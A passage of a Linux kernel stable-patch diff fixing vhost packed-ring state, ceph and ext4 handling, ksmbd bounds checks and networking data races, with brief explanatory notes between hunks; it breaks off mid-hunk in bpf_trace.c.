++++ b/drivers/vhost/vdpa.c
+@@ -549,7 +549,14 @@ static long vhost_vdpa_vring_ioctl(struct vhost_vdpa *v, unsigned int cmd,
+ 		if (r)
+ 			return r;
+ 
+-		vq->last_avail_idx = vq_state.split.avail_index;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq->last_avail_idx = vq_state.packed.last_avail_idx |
++					     (vq_state.packed.last_avail_counter << 15);
++			vq->last_used_idx = vq_state.packed.last_used_idx |
++					    (vq_state.packed.last_used_counter << 15);
++		} else {
++			vq->last_avail_idx = vq_state.split.avail_index;
++		}
+ 		break;
+ 	}
+ 
+@@ -567,9 +574,15 @@ static long vhost_vdpa_vring_ioctl(struct vhost_vdpa *v, unsigned int cmd,
+ 		break;
+ 
+ 	case VHOST_SET_VRING_BASE:
+-		vq_state.split.avail_index = vq->last_avail_idx;
+-		if (ops->set_vq_state(vdpa, idx, &vq_state))
+-			r = -EINVAL;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq_state.packed.last_avail_idx = vq->last_avail_idx & 0x7fff;
++			vq_state.packed.last_avail_counter = !!(vq->last_avail_idx & 0x8000);
++			vq_state.packed.last_used_idx = vq->last_used_idx & 0x7fff;
++			vq_state.packed.last_used_counter = !!(vq->last_used_idx & 0x8000);
++		} else {
++			vq_state.split.avail_index = vq->last_avail_idx;
++		}
++		r = ops->set_vq_state(vdpa, idx, &vq_state);
+ 		break;
+ 
+ 	case VHOST_SET_VRING_CALL:
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 43c9770b86e5a..1a059b028c501 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -1633,17 +1633,25 @@ long vhost_vring_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *arg
+ 			r = -EFAULT;
+ 			break;
+ 		}
+-		if (s.num > 0xffff) {
+-			r = -EINVAL;
+-			break;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED)) {
++			vq->last_avail_idx = s.num & 0xffff;
++			vq->last_used_idx = (s.num >> 16) & 0xffff;
++		} else {
++			if (s.num > 0xffff) {
++				r = -EINVAL;
++				break;
++			}
++			vq->last_avail_idx = s.num;
+ 		}
+-		vq->last_avail_idx = s.num;
+ 		/* Forget the cached index value. */
+ 		vq->avail_idx = vq->last_avail_idx;
+ 		break;
+ 	case VHOST_GET_VRING_BASE:
+ 		s.index = idx;
+-		s.num = vq->last_avail_idx;
++		if (vhost_has_feature(vq, VIRTIO_F_RING_PACKED))
++			s.num = (u32)vq->last_avail_idx | ((u32)vq->last_used_idx << 16);
++		else
++			s.num = vq->last_avail_idx;
+ 		if (copy_to_user(argp, &s, sizeof s))
+ 			r = -EFAULT;
+ 		break;
+diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
+index 790b296271f1e..5e17c4aa73745 100644
+--- a/drivers/vhost/vhost.h
++++ b/drivers/vhost/vhost.h
+@@ -85,13 +85,17 @@ struct vhost_virtqueue {
+ 	/* The routine to call when the Guest pings us, or timeout. */
+ 	vhost_work_fn_t handle_kick;
+ 
+-	/* Last available index we saw. */
++	/* Last available index we saw.
++	 * Values are limited to 0x7fff, and the high bit is used as
++	 * a wrap counter when using VIRTIO_F_RING_PACKED. */
+ 	u16 last_avail_idx;
+ 
+ 	/* Caches available index value from user. */
+ 	u16 avail_idx;
+ 
+-	/* Last index we used. */
++	/* Last index we used.
++	 * Values are limited to 0x7fff, and the high bit is used as
++	 * a wrap counter when using VIRTIO_F_RING_PACKED. */
+ 	u16 last_used_idx;
+ 
+ 	/* Used flags */
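To make the encoding concrete: for packed rings each saved 16-bit value keeps the ring index in bits 0..14 and the wrap counter in bit 15, and VHOST_GET_VRING_BASE packs last_avail into the low half and last_used into the high half of the 32-bit num. A standalone sketch of the arithmetic (plain userspace C, not kernel code):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
        uint16_t last_avail_idx = (1u << 15) | 42;  /* wrap=1, idx=42 */
        uint16_t last_used_idx  = (0u << 15) | 40;  /* wrap=0, idx=40 */

        /* what VHOST_GET_VRING_BASE reports for a packed ring */
        uint32_t num = (uint32_t)last_avail_idx |
                       ((uint32_t)last_used_idx << 16);

        printf("avail: idx=%u wrap=%u\n", num & 0x7fff, (num >> 15) & 1);
        printf("used:  idx=%u wrap=%u\n",
               (num >> 16) & 0x7fff, (num >> 31) & 1);
        return 0;
    }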
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index f73b2f62afaae..07dc4ec73520c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -1357,6 +1357,7 @@ static int afs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->dentry	= dentry;
+ 	op->create.mode	= S_IFDIR | mode;
+ 	op->create.reason = afs_edit_dir_for_mkdir;
++	op->mtime	= current_time(dir);
+ 	op->ops		= &afs_mkdir_operation;
+ 	return afs_do_sync_operation(op);
+ }
+@@ -1660,6 +1661,7 @@ static int afs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->dentry	= dentry;
+ 	op->create.mode	= S_IFREG | mode;
+ 	op->create.reason = afs_edit_dir_for_create;
++	op->mtime	= current_time(dir);
+ 	op->ops		= &afs_create_operation;
+ 	return afs_do_sync_operation(op);
+ 
+@@ -1795,6 +1797,7 @@ static int afs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	op->ops			= &afs_symlink_operation;
+ 	op->create.reason	= afs_edit_dir_for_symlink;
+ 	op->create.symlink	= content;
++	op->mtime		= current_time(dir);
+ 	return afs_do_sync_operation(op);
+ 
+ error:
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index faf1178021123..cdb26aadae125 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -1626,6 +1626,7 @@ void ceph_flush_snaps(struct ceph_inode_info *ci,
+ 	struct inode *inode = &ci->netfs.inode;
+ 	struct ceph_mds_client *mdsc = ceph_inode_to_client(inode)->mdsc;
+ 	struct ceph_mds_session *session = NULL;
++	bool need_put = false;
+ 	int mds;
+ 
+ 	dout("ceph_flush_snaps %p\n", inode);
+@@ -1670,8 +1671,13 @@ out:
+ 		ceph_put_mds_session(session);
+ 	/* we flushed them all; remove this inode from the queue */
+ 	spin_lock(&mdsc->snap_flush_lock);
++	if (!list_empty(&ci->i_snap_flush_item))
++		need_put = true;
+ 	list_del_init(&ci->i_snap_flush_item);
+ 	spin_unlock(&mdsc->snap_flush_lock);
++
++	if (need_put)
++		iput(inode);
+ }
+ 
+ /*
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 0b236ebd989fc..2e73ba62bd7aa 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -693,8 +693,10 @@ int __ceph_finish_cap_snap(struct ceph_inode_info *ci,
+ 	     capsnap->size);
+ 
+ 	spin_lock(&mdsc->snap_flush_lock);
+-	if (list_empty(&ci->i_snap_flush_item))
++	if (list_empty(&ci->i_snap_flush_item)) {
++		ihold(inode);
+ 		list_add_tail(&ci->i_snap_flush_item, &mdsc->snap_flush_list);
++	}
+ 	spin_unlock(&mdsc->snap_flush_lock);
+ 	return 1;  /* caller may want to ceph_flush_snaps */
+ }
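The ceph pair of hunks restores refcount symmetry: membership on snap_flush_list now owns one inode reference, taken with ihold() when the inode is queued and dropped with iput() only by the path that actually removed it. The pattern, sketched with hypothetical names:

    /* enqueue: the reference follows list membership */
    spin_lock(&q->lock);
    if (list_empty(&ci->flush_item)) {
        ihold(inode);
        list_add_tail(&ci->flush_item, &q->flush_list);
    }
    spin_unlock(&q->lock);

    /* dequeue: drop the reference only if we really removed it,
     * and only after the spinlock is released (iput() can sleep) */
    spin_lock(&q->lock);
    need_put = !list_empty(&ci->flush_item);
    list_del_init(&ci->flush_item);
    spin_unlock(&q->lock);
    if (need_put)
        iput(inode);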
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 5db1060b8684f..760249d9152d1 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6341,7 +6341,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	struct ext4_mount_options old_opts;
+ 	ext4_group_t g;
+ 	int err = 0;
+-	int enable_rw = 0;
+ #ifdef CONFIG_QUOTA
+ 	int enable_quota = 0;
+ 	int i, j;
+@@ -6528,7 +6527,7 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 			if (err)
+ 				goto restore_opts;
+ 
+-			enable_rw = 1;
++			sb->s_flags &= ~SB_RDONLY;
+ 			if (ext4_has_feature_mmp(sb)) {
+ 				err = ext4_multi_mount_protect(sb,
+ 						le64_to_cpu(es->s_mmp_block));
+@@ -6575,9 +6574,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+ 
+-	if (enable_rw)
+-		sb->s_flags &= ~SB_RDONLY;
+-
+ 	/*
+ 	 * Reinitialize lazy itable initialization thread based on
+ 	 * current settings
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index fddde5045d0c8..51d642a95bd29 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2006,8 +2006,9 @@ inserted:
+ 			else {
+ 				u32 ref;
+ 
++#ifdef EXT4_XATTR_DEBUG
+ 				WARN_ON_ONCE(dquot_initialize_needed(inode));
+-
++#endif
+ 				/* The old block is released after updating
+ 				   the inode. */
+ 				error = dquot_alloc_block(inode,
+@@ -2070,8 +2071,9 @@ inserted:
+ 			/* We need to allocate a new block */
+ 			ext4_fsblk_t goal, block;
+ 
++#ifdef EXT4_XATTR_DEBUG
+ 			WARN_ON_ONCE(dquot_initialize_needed(inode));
+-
++#endif
+ 			goal = ext4_group_first_block_no(sb,
+ 						EXT4_I(inode)->i_block_group);
+ 			block = ext4_new_meta_blocks(handle, inode, goal, 0,
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index b371754540f9c..bf8531b80a182 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -296,6 +296,9 @@ bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+ 	return true;
+ }
+ 
++#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
++#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
++
+ /**
+  * ksmbd_conn_handler_loop() - session thread to listen on new smb requests
+  * @p:		connection instance
+@@ -352,6 +355,9 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+ 
++		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
++			break;
++
+ 		/* 4 for rfc1002 length field */
+ 		/* 1 for implied bcc[0] */
+ 		size = pdu_size + 4 + 1;
+@@ -379,6 +385,12 @@ int ksmbd_conn_handler_loop(void *p)
+ 			continue;
+ 		}
+ 
++		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
++		    SMB2_PROTO_NUMBER) {
++			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
++				break;
++		}
++
+ 		if (!default_conn_ops.process_fn) {
+ 			pr_err("No connection request callback\n");
+ 			break;
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index cbfed03a1e5ce..4b210cdd75569 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -1415,56 +1415,38 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+  */
+ struct lease_ctx_info *parse_lease_state(void *open_req)
+ {
+-	char *data_offset;
+ 	struct create_context *cc;
+-	unsigned int next = 0;
+-	char *name;
+-	bool found = false;
+ 	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	struct lease_ctx_info *lreq = kzalloc(sizeof(struct lease_ctx_info),
+-		GFP_KERNEL);
++	struct lease_ctx_info *lreq;
++
++	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
++	if (IS_ERR_OR_NULL(cc))
++		return NULL;
++
++	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
+ 	if (!lreq)
+ 		return NULL;
+ 
+-	data_offset = (char *)req + le32_to_cpu(req->CreateContextsOffset);
+-	cc = (struct create_context *)data_offset;
+-	do {
+-		cc = (struct create_context *)((char *)cc + next);
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) != 4 ||
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4)) {
+-			next = le32_to_cpu(cc->Next);
+-			continue;
+-		}
+-		found = true;
+-		break;
+-	} while (next != 0);
++	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
++		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+ 
+-	if (found) {
+-		if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
+-			struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+-
+-			memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-			lreq->req_state = lc->lcontext.LeaseState;
+-			lreq->flags = lc->lcontext.LeaseFlags;
+-			lreq->duration = lc->lcontext.LeaseDuration;
+-			memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-			       SMB2_LEASE_KEY_SIZE);
+-			lreq->version = 2;
+-		} else {
+-			struct create_lease *lc = (struct create_lease *)cc;
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++				SMB2_LEASE_KEY_SIZE);
++		lreq->version = 2;
++	} else {
++		struct create_lease *lc = (struct create_lease *)cc;
+ 
+-			memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-			lreq->req_state = lc->lcontext.LeaseState;
+-			lreq->flags = lc->lcontext.LeaseFlags;
+-			lreq->duration = lc->lcontext.LeaseDuration;
+-			lreq->version = 1;
+-		}
+-		return lreq;
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		lreq->version = 1;
+ 	}
+-
+-	kfree(lreq);
+-	return NULL;
++	return lreq;
+ }
+ 
+ /**
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 01887570efe8a..56f661e5ef628 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -979,13 +979,13 @@ static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+ 
+ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				      struct smb2_negotiate_req *req,
+-				      int len_of_smb)
++				      unsigned int len_of_smb)
+ {
+ 	/* +4 is to account for the RFC1001 len field */
+ 	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
+ 	int i = 0, len_of_ctxts;
+-	int offset = le32_to_cpu(req->NegotiateContextOffset);
+-	int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
++	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
++	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
+ 	__le32 status = STATUS_INVALID_PARAMETER;
+ 
+ 	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
+@@ -999,7 +999,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 	while (i++ < neg_ctxt_cnt) {
+ 		int clen, ctxt_len;
+ 
+-		if (len_of_ctxts < sizeof(struct smb2_neg_context))
++		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+@@ -1054,9 +1054,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 		}
+ 
+ 		/* offsets must be 8 byte aligned */
+-		clen = (clen + 7) & ~0x7;
+-		offset = clen + sizeof(struct smb2_neg_context);
+-		len_of_ctxts -= clen + sizeof(struct smb2_neg_context);
++		offset = (ctxt_len + 7) & ~0x7;
++		len_of_ctxts -= offset;
+ 	}
+ 	return status;
+ }
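The (int) cast in the len_of_ctxts check matters because sizeof yields a size_t: comparing a signed int against it converts the int to unsigned, so a negative remaining length would slip past the bounds check. A standalone demonstration (plain C):

    #include <stdio.h>

    int main(void)
    {
        int len = -8;   /* a negative "remaining length" */

        /* len converts to size_t, -8 becomes a huge value, and the
         * too-short condition is never detected */
        printf("unsigned: too short? %d\n", len < sizeof(int));      /* 0 */

        /* casting sizeof to int keeps the comparison signed */
        printf("signed:   too short? %d\n", len < (int)sizeof(int)); /* 1 */
        return 0;
    }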
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index eac51e22a52a8..d5eb3ab8e38f2 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -609,7 +609,7 @@ struct netdev_queue {
+ 	netdevice_tracker	dev_tracker;
+ 
+ 	struct Qdisc __rcu	*qdisc;
+-	struct Qdisc		*qdisc_sleeping;
++	struct Qdisc __rcu	*qdisc_sleeping;
+ #ifdef CONFIG_SYSFS
+ 	struct kobject		kobj;
+ #endif
+@@ -757,8 +757,11 @@ static inline void rps_record_sock_flow(struct rps_sock_flow_table *table,
+ 		/* We only give a hint, preemption can change CPU under us */
+ 		val |= raw_smp_processor_id();
+ 
+-		if (table->ents[index] != val)
+-			table->ents[index] = val;
++		/* The following WRITE_ONCE() is paired with the READ_ONCE()
++		 * here, and another one in get_rps_cpu().
++		 */
++		if (READ_ONCE(table->ents[index]) != val)
++			WRITE_ONCE(table->ents[index], val);
+ 	}
+ }
+ 
+diff --git a/include/linux/page-flags.h b/include/linux/page-flags.h
+index 0b0ae5084e60c..59314d228ec38 100644
+--- a/include/linux/page-flags.h
++++ b/include/linux/page-flags.h
+@@ -631,6 +631,12 @@ PAGEFLAG_FALSE(VmemmapSelfHosted, vmemmap_self_hosted)
+  * Please note that, confusingly, "page_mapping" refers to the inode
+  * address_space which maps the page from disk; whereas "page_mapped"
+  * refers to user virtual address space into which the page is mapped.
++ *
++ * For slab pages, since slab reuses the bits in struct page to store its
++ * internal states, the page->mapping does not exist as such, nor do these
++ * flags below.  So in order to avoid testing non-existent bits, please
++ * make sure that PageSlab(page) actually evaluates to false before calling
++ * the following functions (e.g., PageAnon).  See mm/slab.h.
+  */
+ #define PAGE_MAPPING_ANON	0x1
+ #define PAGE_MAPPING_MOVABLE	0x2
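A sketch of the guard the new comment asks callers for; the page_table_check hunks further down enforce the same rule with BUG_ON() instead:

    /* slab pages reuse the page->mapping bits, so rule them out
     * before testing anon/movable state */
    if (!PageSlab(page) && PageAnon(page))
        handle_anon_page(page);     /* hypothetical handler */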
+diff --git a/include/linux/usb/hcd.h b/include/linux/usb/hcd.h
+index 78cd566ee2380..5a89928ea9534 100644
+--- a/include/linux/usb/hcd.h
++++ b/include/linux/usb/hcd.h
+@@ -500,6 +500,11 @@ void *hcd_buffer_alloc(struct usb_bus *bus, size_t size,
+ void hcd_buffer_free(struct usb_bus *bus, size_t size,
+ 	void *addr, dma_addr_t dma);
+ 
++void *hcd_buffer_alloc_pages(struct usb_hcd *hcd,
++		size_t size, gfp_t mem_flags, dma_addr_t *dma);
++void hcd_buffer_free_pages(struct usb_hcd *hcd,
++		size_t size, void *addr, dma_addr_t dma);
++
+ /* generic bus glue, needed for host controllers that don't use PCI */
+ extern irqreturn_t usb_hcd_irq(int irq, void *__hcd);
+ 
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index b350d92136c8d..a674221d151db 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -350,6 +350,7 @@ enum {
+ enum {
+ 	HCI_SETUP,
+ 	HCI_CONFIG,
++	HCI_DEBUGFS_CREATED,
+ 	HCI_AUTO_OFF,
+ 	HCI_RFKILLED,
+ 	HCI_MGMT,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 061fec6fd0152..84c5ce57eab69 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -513,6 +513,7 @@ struct hci_dev {
+ 	struct work_struct	cmd_sync_work;
+ 	struct list_head	cmd_sync_work_list;
+ 	struct mutex		cmd_sync_work_lock;
++	struct mutex		unregister_lock;
+ 	struct work_struct	cmd_sync_cancel_work;
+ 	struct work_struct	reenable_adv_work;
+ 
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 2f2a6023fb0e5..94a1599824d8f 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -180,7 +180,7 @@ struct pneigh_entry {
+ 	netdevice_tracker	dev_tracker;
+ 	u32			flags;
+ 	u8			protocol;
+-	u8			key[];
++	u32			key[];
+ };
+ 
+ /*
+diff --git a/include/net/netns/ipv6.h b/include/net/netns/ipv6.h
+index b4af4837d80b4..f6e6a3ab91489 100644
+--- a/include/net/netns/ipv6.h
++++ b/include/net/netns/ipv6.h
+@@ -53,7 +53,7 @@ struct netns_sysctl_ipv6 {
+ 	int seg6_flowlabel;
+ 	u32 ioam6_id;
+ 	u64 ioam6_id_wide;
+-	bool skip_notify_on_dev_down;
++	int skip_notify_on_dev_down;
+ 	u8 fib_notify_on_flag_change;
+ };
+ 
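The bool to int change matters because this sysctl is served by an int-based proc handler: proc_dointvec() and friends read and write sizeof(int) bytes through .data, so backing the knob with a one-byte bool lets the handler scribble past the field. Roughly the shape of the table entry involved (a sketch, not the exact upstream entry):

    static struct ctl_table sketch_table[] = {
        {
            .procname     = "skip_notify_on_dev_down",
            .data         = &init_net.ipv6.sysctl.skip_notify_on_dev_down,
            .maxlen       = sizeof(int),   /* handler writes an int */
            .mode         = 0644,
            .proc_handler = proc_dointvec,
        },
        { }
    };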
+diff --git a/include/net/ping.h b/include/net/ping.h
+index 9233ad3de0ade..bc7779262e603 100644
+--- a/include/net/ping.h
++++ b/include/net/ping.h
+@@ -16,11 +16,7 @@
+ #define PING_HTABLE_SIZE 	64
+ #define PING_HTABLE_MASK 	(PING_HTABLE_SIZE-1)
+ 
+-/*
+- * gid_t is either uint or ushort.  We want to pass it to
+- * proc_dointvec_minmax(), so it must not be larger than MAX_INT
+- */
+-#define GID_T_MAX (((gid_t)~0U) >> 1)
++#define GID_T_MAX (((gid_t)~0U) - 1)
+ 
+ /* Compatibility glue so we can support IPv6 when it's compiled as a module */
+ struct pingv6_ops {
+diff --git a/include/net/pkt_sched.h b/include/net/pkt_sched.h
+index 38207873eda69..8ab75128512ab 100644
+--- a/include/net/pkt_sched.h
++++ b/include/net/pkt_sched.h
+@@ -128,6 +128,8 @@ static inline void qdisc_run(struct Qdisc *q)
+ 	}
+ }
+ 
++extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
++
+ /* Calculate maximal size of packet seen by hard_start_xmit
+    routine of this device.
+  */
+diff --git a/include/net/rpl.h b/include/net/rpl.h
+index 308ef0a05caef..30fe780d1e7c8 100644
+--- a/include/net/rpl.h
++++ b/include/net/rpl.h
+@@ -23,9 +23,6 @@ static inline int rpl_init(void)
+ static inline void rpl_exit(void) {}
+ #endif
+ 
+-/* Worst decompression memory usage ipv6 address (16) + pad 7 */
+-#define IPV6_RPL_SRH_WORST_SWAP_SIZE (sizeof(struct in6_addr) + 7)
+-
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre);
+ 
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index af4aa66aaa4eb..989eb972fcaec 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -543,7 +543,7 @@ static inline struct Qdisc *qdisc_root_bh(const struct Qdisc *qdisc)
+ 
+ static inline struct Qdisc *qdisc_root_sleeping(const struct Qdisc *qdisc)
+ {
+-	return qdisc->dev_queue->qdisc_sleeping;
++	return rcu_dereference_rtnl(qdisc->dev_queue->qdisc_sleeping);
+ }
+ 
+ static inline spinlock_t *qdisc_root_sleeping_lock(const struct Qdisc *qdisc)
+@@ -752,7 +752,9 @@ static inline bool qdisc_tx_changing(const struct net_device *dev)
+ 
+ 	for (i = 0; i < dev->num_tx_queues; i++) {
+ 		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
+-		if (rcu_access_pointer(txq->qdisc) != txq->qdisc_sleeping)
++
++		if (rcu_access_pointer(txq->qdisc) !=
++		    rcu_access_pointer(txq->qdisc_sleeping))
+ 			return true;
+ 	}
+ 	return false;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index f11b98bd0244c..2f35b82a123f8 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1148,8 +1148,12 @@ static inline void sock_rps_record_flow(const struct sock *sk)
+ 		 * OR	an additional socket flag
+ 		 * [1] : sk_state and sk_prot are in the same cache line.
+ 		 */
+-		if (sk->sk_state == TCP_ESTABLISHED)
+-			sock_rps_record_flow_hash(sk->sk_rxhash);
++		if (sk->sk_state == TCP_ESTABLISHED) {
++			/* This READ_ONCE() is paired with the WRITE_ONCE()
++			 * from sock_rps_save_rxhash() and sock_rps_reset_rxhash().
++			 */
++			sock_rps_record_flow_hash(READ_ONCE(sk->sk_rxhash));
++		}
+ 	}
+ #endif
+ }
+@@ -1158,15 +1162,19 @@ static inline void sock_rps_save_rxhash(struct sock *sk,
+ 					const struct sk_buff *skb)
+ {
+ #ifdef CONFIG_RPS
+-	if (unlikely(sk->sk_rxhash != skb->hash))
+-		sk->sk_rxhash = skb->hash;
++	/* The following WRITE_ONCE() is paired with the READ_ONCE()
++	 * here, and another one in sock_rps_record_flow().
++	 */
++	if (unlikely(READ_ONCE(sk->sk_rxhash) != skb->hash))
++		WRITE_ONCE(sk->sk_rxhash, skb->hash);
+ #endif
+ }
+ 
+ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ {
+ #ifdef CONFIG_RPS
+-	sk->sk_rxhash = 0;
++	/* Paired with READ_ONCE() in sock_rps_record_flow() */
++	WRITE_ONCE(sk->sk_rxhash, 0);
+ #endif
+ }
+ 
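The rps_record_sock_flow() and sk_rxhash changes above are the standard annotation pattern for intentional data races: a field written in one context and read locklessly in another gets paired WRITE_ONCE()/READ_ONCE() so the compiler cannot tear, fuse, or re-load the accesses (and KCSAN stays quiet). A minimal sketch with a hypothetical shared field:

    #include <linux/compiler.h>
    #include <linux/types.h>

    struct flow_hint { u32 hash; };     /* hypothetical shared field */

    /* writer: avoid dirtying the cache line when nothing changed */
    static void hint_update(struct flow_hint *fh, u32 new_hash)
    {
        if (READ_ONCE(fh->hash) != new_hash)
            WRITE_ONCE(fh->hash, new_hash);
    }

    /* lockless reader */
    static u32 hint_read(const struct flow_hint *fh)
    {
        return READ_ONCE(fh->hash);
    }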
+diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
+index 135205d0d5607..8e87f69aae60d 100644
+--- a/kernel/bpf/map_in_map.c
++++ b/kernel/bpf/map_in_map.c
+@@ -61,9 +61,13 @@ struct bpf_map *bpf_map_meta_alloc(int inner_map_ufd)
+ 	/* Misc members not needed in bpf_map_meta_equal() check. */
+ 	inner_map_meta->ops = inner_map->ops;
+ 	if (inner_map->ops == &array_map_ops) {
++		struct bpf_array *inner_array_meta =
++			container_of(inner_map_meta, struct bpf_array, map);
++		struct bpf_array *inner_array = container_of(inner_map, struct bpf_array, map);
++
++		inner_array_meta->index_mask = inner_array->index_mask;
++		inner_array_meta->elem_size = inner_array->elem_size;
+ 		inner_map_meta->bypass_spec_v1 = inner_map->bypass_spec_v1;
+-		container_of(inner_map_meta, struct bpf_array, map)->index_mask =
+-		     container_of(inner_map, struct bpf_array, map)->index_mask;
+ 	}
+ 
+ 	fdput(f);
+diff --git a/kernel/fork.c b/kernel/fork.c
+index ec913b13c5edb..6bb91fbbf73cc 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -559,6 +559,7 @@ void free_task(struct task_struct *tsk)
+ 	arch_release_task_struct(tsk);
+ 	if (tsk->flags & PF_KTHREAD)
+ 		free_kthread_struct(tsk);
++	bpf_task_storage_free(tsk);
+ 	free_task_struct(tsk);
+ }
+ EXPORT_SYMBOL(free_task);
+@@ -843,7 +844,6 @@ void __put_task_struct(struct task_struct *tsk)
+ 	cgroup_free(tsk);
+ 	task_numa_free(tsk, true);
+ 	security_task_free(tsk);
+-	bpf_task_storage_free(tsk);
+ 	exit_creds(tsk);
+ 	delayacct_tsk_free(tsk);
+ 	put_signal_struct(tsk->signal);
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 9d4163abadf4e..1642548892a8e 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -903,13 +903,23 @@ static const struct bpf_func_proto bpf_send_signal_thread_proto = {
+ 
+ BPF_CALL_3(bpf_d_path, struct path *, path, char *, buf, u32, sz)
+ {
++	struct path copy;
+ 	long len;
+ 	char *p;
+ 
+ 	if (!sz)
+ 		return 0;
+ 
+-	p = d_path(path, buf, sz);
